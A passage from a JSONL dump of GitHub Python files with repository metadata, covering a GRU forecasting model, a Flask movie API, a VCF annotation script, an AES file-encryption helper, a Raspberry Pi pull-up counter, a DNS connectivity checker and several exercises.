nn.Softplus()\n \n def forward(self, x):\n hidden_state0 = torch.zeros(self.D*self.layer_num, x.size(0), self.num_neurons).to(self.device)\n output, _ = self.gru(x, hidden_state0)\n pre_sigma = self.distribution_presigma(output[:,-1,:])\n mu = self.distribution_mu(output[:,-1,:])\n sigma = self.distribution_sigma(pre_sigma)\n return mu, sigma","repo_name":"icarusunimelb/Multi-objective-gradient-descent-wind-power-interval-prediction","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8268512893","text":"from sys import stdout\n\ndef solve():\n n,k = map(int,input().split())\n \n checksum = 0\n\n for x in range (n):\n question = x ^ checksum\n checksum = x\n print(question)\n stdout.flush()\n ans = int(input())\n if (ans == 1):\n break\n else:\n continue\n\n\ndef main():\n t = int(input())\n for _ in range (t):\n solve()\n\nmain()","repo_name":"3-24/problem-solving","sub_path":"codeforces/1543/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16030047839","text":"import asyncio\nimport aiofiles\n\n\ndef read_large_file():\n with open('..\\\\data\\\\big_file.txt', 'r') as f:\n return f.read()\n\n\n# поки йде вичитка файлу, якісь інші карутини можуть щось робити\nasync def async_read_large_file():\n async with aiofiles.open('..\\\\data\\\\big_file.txt', 'r') as f:\n return await f.read()\n\n\ndef count_words(text):\n return len(text.split(' '))\n\n\n# асинхронне виконання програми\nasync def async_main():\n text = await async_read_large_file()\n print(count_words(text))\n\n\n# послідовне виконання програми\ndef main():\n text = read_large_file()\n print(count_words(text))\n\n\nif __name__ == \"__main__\":\n asyncio.run(async_main())\n main()\n","repo_name":"stepanskyvlad/Learning-Python","sub_path":"Multithreading_and_Multiprocessing/Module_asyncio/03_async_files.py","file_name":"03_async_files.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11067490115","text":"import os, random, struct\nimport numpy as np\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nimport time\n\n\ndef encrypt_file(key, input_path, chunksize=64*1024, use_aesni=True):\n \"\"\" Encrypts a file using AES (CBC mode) with the\n given key.\n\n key:\n The encryption key - a string that must be\n either 16, 24 or 32 bytes long. Longer keys\n are more secure.\n\n input_path:\n Name of the input file\n\n output_path:\n If None, '.enc' will be used.\n\n chunksize:\n Sets the size of the chunk which the function\n uses to read and encrypt the file. Larger chunk\n sizes can be faster for some files and machines.\n chunksize must be divisible by 16.\n \"\"\"\n output_path = os.path.join(os.path.dirname(input_path), 'encrypted_' + os.path.basename(input_path))\n #iv = Random.new().read(16)\n encryptor = AES.new(key, AES.MODE_CTR, use_aesni=use_aesni)\n filesize = os.path.getsize(input_path)\n encryption_time = []\n with open(input_path, 'rb') as infile:\n with open(output_path, 'wb') as outfile:\n outfile.write(struct.pack(' 0 and len(bomb_effects) > 0:\n first_effects = bomb_effects.popleft()\n last_casting = bomb_casing.pop()\n current_result = first_effects + last_casting\n flag = False\n\n for ch in dict_bombs:\n if dict_bombs[ch] == current_result:\n flag = True\n add_dict[ch] += 1\n break\n\n if (add_dict[\"Cherry Bombs\"] >= 3) and (add_dict[\"Datura Bombs\"] >= 3) and (add_dict[\"Smoke Decoy Bombs\"] >= 3):\n condition = True\n break\n\n if not flag:\n last_casting -= 5\n bomb_effects.appendleft(first_effects)\n bomb_casing.append(last_casting)\n\n\nif not condition:\n print(\"You don't have enough materials to fill the bomb pouch.\")\nelse:\n print(\"Bene! You have successfully filled the bomb pouch!\")\n\nif len(bomb_effects) == 0:\n print(f\"Bomb Effects: empty\")\nelse:\n print(f\"Bomb Effects: {', '.join(str(ch) for ch in bomb_effects)}\")\n\nif len(bomb_casing) == 0:\n print(f\"Bomb Casings: empty\")\nelse:\n print(f\"Bomb Casings: {', '.join(str(ch) for ch in bomb_casing)}\")\n\nfor keys, values in add_dict.items():\n print(f\"{keys}: {values}\")","repo_name":"AlexanderBedrosyan/Programming-Advanced-with-Python","sub_path":"Advanced Exam Preparation/Regular Exam - 27 June 2020/bombs.py","file_name":"bombs.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15879563859","text":"import unittest\n\nfrom view_layer_common import *\n\n\n# ############################################################\n# Testing\n# ############################################################\n\nclass UnitTesting(MoveLayerCollectionTesting):\n def get_reference_scene_tree_map(self):\n # original tree, no changes\n reference_tree_map = [\n ['A', [\n ['i', None],\n ['ii', None],\n ['iii', None],\n ]],\n ['B', None],\n ['C', [\n ['1', None],\n ['2', None],\n ['3', [\n ['dog', None],\n ['cat', None],\n ]],\n ]],\n ]\n return reference_tree_map\n\n def get_reference_layers_tree_map(self):\n # original tree, no changes\n reference_layers_map = [\n ['Layer 1', [\n 'Master Collection',\n 'C',\n '3',\n ]],\n ['Layer 2', [\n 'C',\n '3',\n 'dog',\n 'cat',\n ]],\n ]\n return reference_layers_map\n\n def test_layer_collection_into(self):\n \"\"\"\n Test outliner operations\n \"\"\"\n self.setup_tree()\n self.assertFalse(self.move_into(\"Layer 1.C.2\", \"Layer 2.3\"))\n self.compare_tree_maps()\n\n\n# ############################################################\n# Main - Same For All Render Layer Tests\n# ############################################################\n\nif __name__ == '__main__':\n UnitTesting._extra_arguments = setup_extra_arguments(__file__)\n unittest.main()\n","repo_name":"blender/blender","sub_path":"tests/python/view_layer/test_move_into_layer_collection_a.py","file_name":"test_move_into_layer_collection_a.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"17077291676","text":"from flask import request\nfrom flask_restx import Resource, Namespace\n\nfrom dao.model.movie import MovieSchema\nfrom implemented import movie_service\nfrom service.decorators import admin_required, auth_required\n\nmovie_ns = Namespace('movies')\n\n\n@movie_ns.route('/')\nclass MoviesView(Resource):\n @auth_required # Применяем декоратор для доступа после регистрации\n def get(self):\n # Выгружаем все фильмы\n director = request.args.get(\"director_id\")\n genre = request.args.get(\"genre_id\")\n year = request.args.get(\"year\")\n filters = {\n \"director_id\": director,\n \"genre_id\": genre,\n \"year\": year,\n }\n all_movies = movie_service.get_all(filters)\n res = MovieSchema(many=True).dump(all_movies)\n return res, 200\n\n @admin_required # Применяем декоратор для проверки роли(админ или нет)\n def post(self):\n # Добавляем фильм\n req_json = request.json\n movie = movie_service.create(req_json)\n return \"\", 201, {\"location\": f\"/movies/{movie.id}\"}\n\n\n@movie_ns.route('/')\nclass MovieView(Resource):\n @auth_required # Применяем декоратор для доступа после регистрации\n def get(self, bid):\n # Получаем фильм по ID\n b = movie_service.get_one(bid)\n sm_d = MovieSchema().dump(b)\n return sm_d, 200\n\n @admin_required # Применяем декоратор для проверки роли(админ или нет)\n def put(self, bid):\n # Редактируем информацию о фильме\n req_json = request.json\n if \"id\" not in req_json:\n req_json[\"id\"] = bid\n movie_service.update(req_json)\n return \"\", 204\n\n @admin_required # Применяем декоратор для проверки роли(админ или нет)\n def delete(self, bid):\n # Удаляем фильм\n movie_service.delete(bid)\n return \"\", 204\n","repo_name":"Nik16221/HW19","sub_path":"views/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5248678418","text":"#!/usr/bin/env python3\n\n# Takes in VCF file annotated with medaka tools annotate and converts\n#\n# Usage statement:\n# python convert_VCF_info_fields.py in_vcf.vcf out_vcf.vcf\n\n# 10/21/2020 - Nathan P. Roach, natproach@gmail.com\n\nimport re\nimport sys\nfrom collections import OrderedDict\nfrom math import log10\n\nimport scipy.stats\n\n\ndef pval_to_phredqual(pval):\n try:\n ret = round(-10 * log10(pval))\n except ValueError:\n ret = 2147483647 # transform pval of 0.0 to max signed 32 bit int\n return ret\n\n\ndef parseInfoField(info):\n info_fields = info.split(\";\")\n info_dict = OrderedDict()\n for info_field in info_fields:\n code, val = info_field.split(\"=\")\n info_dict[code] = val\n return info_dict\n\n\ndef annotateVCF(in_vcf_filepath, out_vcf_filepath):\n \"\"\"Postprocess output of medaka tools annotate.\n\n Splits multiallelic sites into separate records.\n Replaces medaka INFO fields that might represent information of the ref\n and multiple alternate alleles with simple ref, alt allele counterparts.\n \"\"\"\n\n in_vcf = open(in_vcf_filepath, \"r\")\n # medaka INFO fields that do not make sense after splitting of\n # multi-allelic records\n # DP will be overwritten with the value of DPSP because medaka tools\n # annotate currently only calculates the latter correctly\n # (https://github.com/nanoporetech/medaka/issues/192).\n # DPS, which is as unreliable as DP, gets skipped and the code\n # calculates the spanning reads equivalent DPSPS instead.\n to_skip = {\"SC\", \"SR\", \"AR\", \"DP\", \"DPSP\", \"DPS\"}\n struct_meta_pat = re.compile(\"##(.+)=\")\n header_lines = []\n contig_ids = set()\n contig_ids_simple = set()\n # parse the metadata lines of the input VCF and drop:\n # - duplicate lines\n # - INFO lines declaring keys we are not going to write\n # - redundant contig information\n while True:\n line = in_vcf.readline()\n if line[:2] != \"##\":\n assert line.startswith(\"#CHROM\")\n break\n if line in header_lines:\n # the annotate tool may generate lines already written by\n # medaka variant again (example: medaka version line)\n continue\n match = struct_meta_pat.match(line)\n if match:\n match_type, match_id, match_misc = match.groups()\n if match_type == \"INFO\":\n if match_id == \"DPSP\":\n line = line.replace(\"DPSP\", \"DP\")\n elif match_id in to_skip:\n continue\n elif match_type == \"contig\":\n contig_ids.add(match_id)\n if not match_misc:\n # the annotate tools writes its own contig info,\n # which is redundant with contig info generated by\n # medaka variant, but lacks a length value.\n # We don't need the incomplete line.\n contig_ids_simple.add(match_id)\n continue\n header_lines.append(line)\n # Lets check the above assumption about each ID-only contig line\n # having a more complete counterpart.\n assert not (contig_ids_simple - contig_ids)\n header_lines.insert(1, \"##convert_VCF_info_fields=0.2\\n\")\n header_lines += [\n '##INFO=\\n',\n '##INFO=\\n',\n '##INFO=\\n',\n '##INFO=\\n',\n '##INFO=\\n',\n '##INFO=\\n',\n '##INFO=\\n',\n line,\n ]\n\n with open(out_vcf_filepath, \"w\") as out_vcf:\n out_vcf.writelines(header_lines)\n for line in in_vcf:\n fields = line.split(\"\\t\")\n info_dict = parseInfoField(fields[7])\n sr_list = [int(x) for x in info_dict[\"SR\"].split(\",\")]\n sc_list = [int(x) for x in info_dict[\"SC\"].split(\",\")]\n if len(sr_list) != len(sc_list):\n print(\"WARNING - SR and SC are different lengths, \" \"skipping variant\")\n print(line.strip()) # Print the line for debugging purposes\n continue\n variant_list = fields[4].split(\",\")\n dpsp = int(info_dict[\"DPSP\"])\n ref_fwd, ref_rev = 0, 1\n dpspf, dpspr = (int(x) for x in info_dict[\"AR\"].split(\",\"))\n for i in range(0, len(sr_list), 2):\n dpspf += sr_list[i]\n dpspr += sr_list[i + 1]\n for j, i in enumerate(range(2, len(sr_list), 2)):\n dp4 = (sr_list[ref_fwd], sr_list[ref_rev], sr_list[i], sr_list[i + 1])\n dp2x2 = [[dp4[0], dp4[1]], [dp4[2], dp4[3]]]\n _, p_val = scipy.stats.fisher_exact(dp2x2)\n sb = pval_to_phredqual(p_val)\n\n as_ = (sc_list[ref_fwd], sc_list[ref_rev], sc_list[i], sc_list[i + 1])\n\n info = []\n for code in info_dict:\n if code in to_skip:\n continue\n val = info_dict[code]\n info.append(\"%s=%s\" % (code, val))\n\n info.append(\"DP=%d\" % dpsp)\n info.append(\"DPSPS=%d,%d\" % (dpspf, dpspr))\n\n if dpsp == 0:\n info.append(\"AF=NaN\")\n else:\n af = (dp4[2] + dp4[3]) / dpsp\n info.append(\"AF=%.6f\" % af)\n if dpspf == 0:\n info.append(\"FAF=NaN\")\n else:\n faf = dp4[2] / dpspf\n info.append(\"FAF=%.6f\" % faf)\n if dpspr == 0:\n info.append(\"RAF=NaN\")\n else:\n raf = dp4[3] / dpspr\n info.append(\"RAF=%.6f\" % raf)\n info.append(\"SB=%d\" % sb)\n info.append(\"DP4=%d,%d,%d,%d\" % dp4)\n info.append(\"AS=%d,%d,%d,%d\" % as_)\n new_info = \";\".join(info)\n fields[4] = variant_list[j]\n fields[7] = new_info\n out_vcf.write(\"\\t\".join(fields))\n in_vcf.close()\n\n\nif __name__ == \"__main__\":\n annotateVCF(sys.argv[1], sys.argv[2])\n","repo_name":"galaxyproject/tools-iuc","sub_path":"tools/medaka/convert_VCF_info_fields.py","file_name":"convert_VCF_info_fields.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"61"} +{"seq_id":"24041656007","text":"\"\"\"\n ** Class Memberships **\n memberships view model\n\"\"\"\nfrom __future__ import annotations\nfrom collections import Callable\nfrom typing import List\n\nfrom marshmallow import fields\nfrom _swagger_api.schemas.coupons import CouponResponseSchema\nfrom flask_apispec import doc, marshal_with, use_kwargs\nfrom _swagger_api import ViewModel\nfrom _swagger_api.schemas.memberships import MembershipPaymentResponseSchema, MembershipResponseSchema\nfrom security.api_authenticator import handle_api_auth\nfrom views import memberships_view, coupons_view\n\n\nclass MembershipsView(ViewModel):\n \"\"\"\n ** Class MembershipsView **\n View model for Memberships\n \"\"\"\n def __new__(cls, *args, **kwargs) -> MembershipsView:\n cls.methods: List[str] = ['GET', 'POST', 'PUT']\n cls.method_decorators: List[Callable] = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n super().__init__()\n\n @staticmethod\n @doc(description=memberships_view.is_member_off.__doc__)\n @marshal_with(MembershipResponseSchema)\n def get(**payload) -> tuple:\n \"\"\"\n **get memberships**\n Get all memberships\n \"\"\"\n return memberships_view.is_member_off(**payload)\n\n @staticmethod\n @doc(description=memberships_view.add_membership.__doc__)\n @marshal_with(MembershipResponseSchema)\n def post(**payload) -> tuple:\n \"\"\"\n **create memberships**\n Create a new membership\n \"\"\"\n return memberships_view.add_membership(**payload)\n\n @staticmethod\n @doc(description=memberships_view.update_membership.__doc__)\n @marshal_with(MembershipResponseSchema)\n def put(**payload) -> tuple:\n \"\"\"\n ** update membership **\n Update a membership\n \"\"\"\n return memberships_view.update_membership(**payload)\n\n\nclass MembershipPaymentsView(ViewModel):\n \"\"\"\n ** Class MembershipPaymentsView **\n allows clients to access & create memberships payment records\n \"\"\"\n\n def __new__(cls, *args, **kwargs) -> MembershipPaymentsView:\n \"\"\"new MembershipPaymentsView\"\"\"\n cls.methods = ['GET', 'POST', 'PUT']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n \"\"\"initialize MembershipPaymentsView\"\"\"\n super().__init__()\n\n @staticmethod\n @doc(description=\"get membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def get(**payload) -> tuple:\n \"\"\"\n get membership payment record\n :return:\n \"\"\"\n pass\n\n @staticmethod\n @doc(description=\"create membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def post(**payload) -> tuple:\n \"\"\"\n ** create membership **\n create membership payment record\n :return:\n \"\"\"\n pass\n\n @staticmethod\n @doc(description=\"update membership payment record\")\n @marshal_with(MembershipPaymentResponseSchema)\n def put(**payload) -> tuple:\n \"\"\"\n ** update membership **\n update membership payment record\n :return:\n \"\"\"\n pass\n\n\nclass CouponsView(ViewModel):\n \"\"\"\n allows access and updating of coupon codes\n\n \"\"\"\n def __new__(cls, *args, **kwargs) -> CouponsView:\n cls.methods = ['GET', 'POST', 'PUT']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n super().__init__()\n\n @staticmethod\n @doc(description=\"get coupon code\")\n @marshal_with(CouponResponseSchema)\n def get(**payload) -> tuple:\n \"\"\"\n ** get coupon codes **\n get Coupons View\n :param payload:\n :return:\n \"\"\"\n # coupon_data must include organization_id and code\n return coupons_view.get_coupon(coupon_data=payload)\n\n @staticmethod\n @doc(description=\"create coupon code\")\n @marshal_with(CouponResponseSchema)\n @use_kwargs({'organization_id': fields.String(), 'code': fields.String(), 'discount': fields.Integer(),\n 'expiration_time': fields.Integer()}, location='json')\n def post(**payload) -> tuple:\n \"\"\"\n ** create coupon codes **\n create new coupon codes\n :param payload:\n :return:\n \"\"\"\n # organization_id: str, code: str, discount: int, expiration_time: str\n return coupons_view.add_coupon(**payload)\n\n @staticmethod\n @doc(description=\"update coupon code\")\n @marshal_with(CouponResponseSchema)\n @use_kwargs({'organization_id': fields.String(), 'code': fields.String(), 'discount': fields.Integer(),\n 'expiration_time': fields.Integer()}, location='json')\n def put(**payload) -> tuple:\n \"\"\"\n ** put coupon **\n update coupon codes\n :param payload:\n :return:\n \"\"\"\n # organization_id: str, code: str, discount: int, expiration_time: int\n return coupons_view.add_coupon(**payload)\n\n\nclass CouponsListView(ViewModel):\n \"\"\"\n **Class CouponsListView**\n will return a list of all coupon codes\n \"\"\"\n\n def __new__(cls, *args, **kwargs) -> CouponsListView:\n \"\"\"New CouponsListView\"\"\"\n cls.methods = ['GET', 'POST', 'PUT', 'DELETE']\n cls.method_decorators = [handle_api_auth]\n return super().__new__(cls, *args, **kwargs)\n\n def __init__(self):\n \"\"\"initialize CouponsListView\"\"\"\n super().__init__()\n\n @staticmethod\n @doc(description=\"get coupons list\")\n @use_kwargs({'organization_id': fields.String()}, location='json')\n def get(**payload) -> tuple:\n \"\"\"\n will return a list of all coupon codes\n :return:\n \"\"\"\n return coupons_view.get_all_coupons(organization_id=payload.get('organization_id'))\n","repo_name":"Memberships-Affiliate-Management-API/membership_and_affiliate_api","sub_path":"_swagger_api/memberships/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23996084719","text":"import sys\nimport logging\nimport traceback\nimport dramatiq\n\nfrom gold_crowdsale.scheduler.transfers import select_transfers\nfrom gold_crowdsale.scheduler.withdrawals import select_withdrawals, select_withdraw_cycles\nfrom gold_crowdsale.scheduler.queues import select_transfer_queue, select_withdraw_queue\nfrom gold_crowdsale.settings import DEFAULT_TIME_FORMAT\nfrom gold_crowdsale.rates.models import create_rate_obj\nfrom gold_crowdsale.rates.serializers import UsdRateSerializer\nfrom gold_crowdsale.transfers.models import TokenTransfer\nfrom gold_crowdsale.withdrawals.models import TransactionManager, WithdrawTransaction, WithdrawCycle\n\n\n@dramatiq.actor(max_retries=0)\ndef create_rates_task():\n try:\n usd_rate = create_rate_obj()\n logging.info(f'RATES TASK: Prices updated, new values: {UsdRateSerializer(usd_rate).data} '\n f'at {usd_rate.creation_datetime.strftime(DEFAULT_TIME_FORMAT)}')\n except Exception as e:\n logging.error(f'RATES TAKS FAILED: Cannot fetch new rates because: {e}')\n logging.error('\\n'.join(traceback.format_exception(*sys.exc_info())))\n\n\n@dramatiq.actor(max_retries=0)\ndef select_created_transfers():\n select_transfers(TokenTransfer.Status.CREATED)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_transfers():\n select_transfers(TokenTransfer.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_processing_withdrawals():\n select_withdrawals(\n WithdrawTransaction.Status.CREATED,\n WithdrawTransaction.Status.PENDING,\n WithdrawTransaction.Status.WAITING_FOR_ERC20_TRANSFERS,\n WithdrawTransaction.Status.WAITING_FOR_GAS_REFILL\n )\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_withdrawals():\n select_withdrawals(WithdrawTransaction.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_withdraw_cycles():\n select_withdraw_cycles(WithdrawCycle.Status.PENDING)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_erc20_withdraw_queues():\n select_withdraw_queue(TransactionManager.QueueType.ERC20)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_gas_refill_withdraw_queues():\n select_withdraw_queue(TransactionManager.QueueType.GAS_REFILL)\n\n\n@dramatiq.actor(max_retries=0)\ndef select_pending_transfer_queue():\n select_transfer_queue()\n\n","repo_name":"DucatusX/gold_crowdsale_backend","sub_path":"gold_crowdsale/scheduler/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29236037943","text":"#!/usr/bin/python\n\nimport time\nimport sys\n\nimport wiringpi2 as wiringpi\nfrom helper.InactivityTimer import InactivityTimer\nfrom sensors.MotionSensor import MotionSensor\nfrom sensors.DistanceSensor import DistanceSensor\nfrom sensors.Display import Display\nfrom sensors.Buzzer import Buzzer\nfrom sensors.Led import Led\nfrom pullup.PullupStorage import PullupStorage\nimport configuration as config\n\n\n# Globals\nINPUT = 0\nOUTPUT = 1\nLOW = 0\nHIGH = 1\n\ninactivity_timer = None\nmotion_sensor = None\ndistance_sensor = None\nlcd = None\nbuzzer = None\nled = None\nstorage = None\nlast_pullup_time = 0\n\npullup_count_today = 0\npullup_count_alltime = 0\npullups_to_go = config.PULLUPS_PER_DAY\n\n\ndef delay(delay_microseconds):\n time.sleep(delay_microseconds/1000000.0)\n\n\ndef delay_milli(delay_milliseconds):\n delay(delay_milliseconds * 1000)\n\n\ndef shutdown():\n global lcd\n global led\n\n if config.DEBUG:\n print(\"shutting down\")\n led.off()\n lcd.off()\n\n\ndef wakeup():\n global lcd\n global led\n global pullup_count_alltime\n global storage\n if config.DEBUG:\n print(\"waking up\")\n print(\"pullups all time: \", storage.get_alltime_count())\n print(\"pullups today: \", storage.get_today_count())\n led.on()\n lcd.on()\n lcd.message(0, 0, \"Welcome ATHLETE!\")\n lcd.message(0, 1, str(pullup_count_alltime) + \" Pullups\")\n\n\ndef count_pullup():\n global pullup_count_today\n global pullups_to_go\n global pullup_count_alltime\n global last_pullup_time\n global storage\n\n storage.count_pullup()\n\n pullup_count_today += 1\n pullup_count_alltime += 1\n pullups_to_go -= 1\n\n last_pullup_time = wiringpi.millis()\n return pullup_count_today\n\n\ndef init_storage():\n global storage\n global pullup_count_today\n global pullup_count_alltime\n global pullups_to_go\n storage = PullupStorage(config.DB_HOST, config.DB_NAME, config.DB_USER, config.DB_PASS)\n pullup_count_alltime = storage.get_alltime_count()\n pullup_count_today = storage.get_today_count()\n pullups_to_go = pullups_to_go - pullup_count_today\n\n\ndef main():\n global lcd\n global inactivity_timer\n global motion_sensor\n global distance_sensor\n global lcd\n global buzzer\n global led\n global last_pullup_time\n global pullup_count_alltime\n global pullups_to_go\n global storage\n\n wiringpi.wiringPiSetupGpio()\n\n init_storage()\n\n inactivity_timer = InactivityTimer(wakeup, shutdown, config.SHUTDOWN_DELAY)\n motion_sensor = MotionSensor(wiringpi, config.MOTION, inactivity_timer.trigger)\n distance_sensor = DistanceSensor(wiringpi, config.SONIC_ECHO, config.SONIC_TRIG)\n lcd = Display(config.LCD_RS, config.LCD_E, config.LCD_D4, config.LCD_D5, config.LCD_D6, config.LCD_D7, config.LCD_K)\n buzzer = Buzzer(wiringpi, config.BUZZER)\n led = Led(wiringpi, config.LED_PIN)\n\n distance_resetted = True\n\n shutdown()\n\n while True:\n if inactivity_timer.is_active():\n distance = distance_sensor.measure()\n\n distance_str = \"{:13.2f}\".format(distance)\n\n if config.DEBUG:\n print(distance_str + \" cm\")\n # if wiringpi.millis() % 5 == 0:\n # lcd.message(0, 0, distance_str + \" cm\")\n\n # only count a pullup if:\n # - distance is smaller than 5cm\n # - distance was resetted (athlete moved more than 20 cm away from sensor)\n # - last pullup was done more than 1 second ago\n if 0 < distance < config.COUNT_DISTANCE and distance_resetted and wiringpi.millis() > (last_pullup_time + config.RESET_TIME):\n buzzer.beep(5000)\n distance_resetted = False\n cnt = count_pullup()\n lcd.clear()\n lcd.message(0, 0, \"Pullups: \" + str(cnt).rjust(5))\n lcd.message(0, 1, \"2do2day: \" + str(pullups_to_go).rjust(5))\n elif distance > config.RESET_DISTANCE:\n distance_resetted = True\n\n delay_milli(100)\n\n inactivity_timer.loop()\n motion_sensor.sense()\n\n if config.DEBUG and inactivity_timer.is_active() == 1:\n print(\"shutting down in \" + inactivity_timer.get_seconds_till_shutdown() + \" seconds\")\n # lcd.message(0, 1, \"SHUTDOWN in: \" + inactivity_timer.get_seconds_till_shutdown().ljust(3))\n\n\nif __name__ == \"__main__\":\n try:\n if len(sys.argv) == 2 and sys.argv[1] == \"setup_storage\":\n print(\"setting up table in database\")\n init_storage()\n storage.setup()\n print(\"done.\")\n else:\n main()\n except (KeyboardInterrupt, SystemExit):\n shutdown()\n","repo_name":"lukey78/pullupsensor","sub_path":"pullupsensor.py","file_name":"pullupsensor.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41626535644","text":"\"\"\" opens a socket to a DNS server.\n When it fails, it prints a timestamp and a description of the failure.\n\"\"\"\nimport socket\nimport time\nfrom random import random\nfrom itertools import cycle\n\ndef socket_to_host(host=\"8.8.8.8\", port=53, timeout=3):\n \"\"\" Attempt to open a socket.\n Return bool for success and a string of info.\n \"\"\"\n try:\n socket.setdefaulttimeout(timeout)\n socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))\n return True, ''\n except socket.error as ex:\n return False, f'{ex}'\n\ndef str_now():\n \"\"\" Return a timestamp string\n \"\"\"\n return time.strftime('%b-%d %H:%M:%S', time.localtime())\n\nHOST_IPS = [\n '8.8.8.8', # google DNS server\n '208.67.222.222', # open DNS\n '208.67.220.220', # open DNS\n # '192.168.2.3', # test IP that I know will not respond\n ]\n\nTICKER = '|/-\\\\'\n\nif __name__ == '__main__':\n print(f'{__file__} starting at {str_now()}')\n\n ticks = cycle(TICKER) # circular list of spinning line characters\n host_ips = cycle(HOST_IPS) # circular list of ip addresses\n while True:\n a_host = next(host_ips)\n b_good, e_str = socket_to_host(a_host)\n if not b_good:\n print(f'FAILED at {str_now()} to {a_host} {e_str}')\n else:\n print(next(ticks)+'\\r', end=' ', flush=True)\n time.sleep(2 + random() * 2)\n","repo_name":"BobBaylor/dropout","sub_path":"dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8902809390","text":"class Coalition:\n\n def __init__(self, n, ch_function):\n self.n = n # no. of agents n\n self.final_coalition = [] # stores the final sets of coalition\n self.discard = set() # stores the agents which is now the part of final coalition\n self.chf_table = ch_function # characteristic function table\n\n # forms the final optimal coalition\n def find_optimal_coalition(self):\n # when an agent forms a coalition, it is added to the discard set\n # the loop runs until all the agents become part of some coalition\n while(len(self.discard) != self.n):\n self.find_coalition()\n\n # it compares the optimal coalitions of each agent i and returns the most optimal among them\n def find_coalition(self):\n global payoff\n global optimal\n payoff = 0\n optimal = set()\n for x in range(self.n):\n if x in self.discard:\n continue\n # all the agents broadcast their most optimal coalition and the most optimal among them is chosen\n t_payoff, t_optimal = self.calculate_si(x)\n if (t_payoff > payoff):\n payoff = t_payoff\n optimal = t_optimal\n # all the elements which have become part of this coalition are added to the discard set\n for x in optimal:\n self.discard.add(x)\n # join the most optimal coalition to the final optimal coalition\n self.final_coalition.append(optimal)\n\n # gives the most optimal coalition and its value for an agent i\n def calculate_si(self, i):\n global payoff # stores the payoff of the optimal coalition\n global optimal # stores the most optimal coalition for the agent i\n payoff = 0\n optimal = set()\n # print(\"for i \", i)\n # iterate through all coalitions that include i\n for coalition, _ in self.chf_table.items():\n d = set(coalition) # typecasting tuple to set\n if i in coalition and len(d.intersection(self.discard)) == 0:\n if (self.chf_table[coalition]/(len(coalition)) > payoff):\n optimal = coalition\n payoff = self.chf_table[coalition]/len(coalition)\n\n # print(\"the payoff is \", payoff)\n # print(\"the optimal is \", optimal)\n return payoff, optimal\n\n # it prints the optimal coalition table\n def print_optimal_coalition(self):\n print(\"Final optimal coalition: \")\n for coalition in self.final_coalition:\n print(coalition)\n print('\\n')\n","repo_name":"jainkashish/MAS-PROJECT","sub_path":"coalition.py","file_name":"coalition.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39501414131","text":"# \"\"\"\n# This is the interface that allows for creating nested lists.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger(object):\n# def isInteger(self):\n# \"\"\"\n# @return {boolean} True if this NestedInteger holds a single integer,\n# rather than a nested list.\n# \"\"\"\n#\n# def getInteger(self):\n# \"\"\"\n# @return {int} the single integer that this NestedInteger holds,\n# if it holds a single integer\n# Return None if this NestedInteger holds a nested list\n# \"\"\"\n#\n# def getList(self):\n# \"\"\"\n# @return {NestedInteger[]} the nested list that this NestedInteger holds,\n# if it holds a nested list\n# Return None if this NestedInteger holds a single integer\n# \"\"\"\nfrom collections import deque\n\n\nclass Solution(object):\n # @param {NestedInteger[]} nestedList a list of NestedInteger Object\n # @return {int} an integer\n # BFS\n def depthSum(self, nestedList):\n if not nestedList:\n return 0\n ans = 0\n q = deque([(nestedList, 1)])\n while len(q) > 0:\n curt, level = q.popleft()\n for elem in curt:\n if elem.isInteger():\n ans += elem.getInteger() * level\n else:\n q.append((elem.getList(), level + 1))\n return ans\n\n","repo_name":"jwyx3/practices","sub_path":"python/nested-list-weight-sum.py","file_name":"nested-list-weight-sum.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6550813271","text":"import numpy as np\nfrom collections import 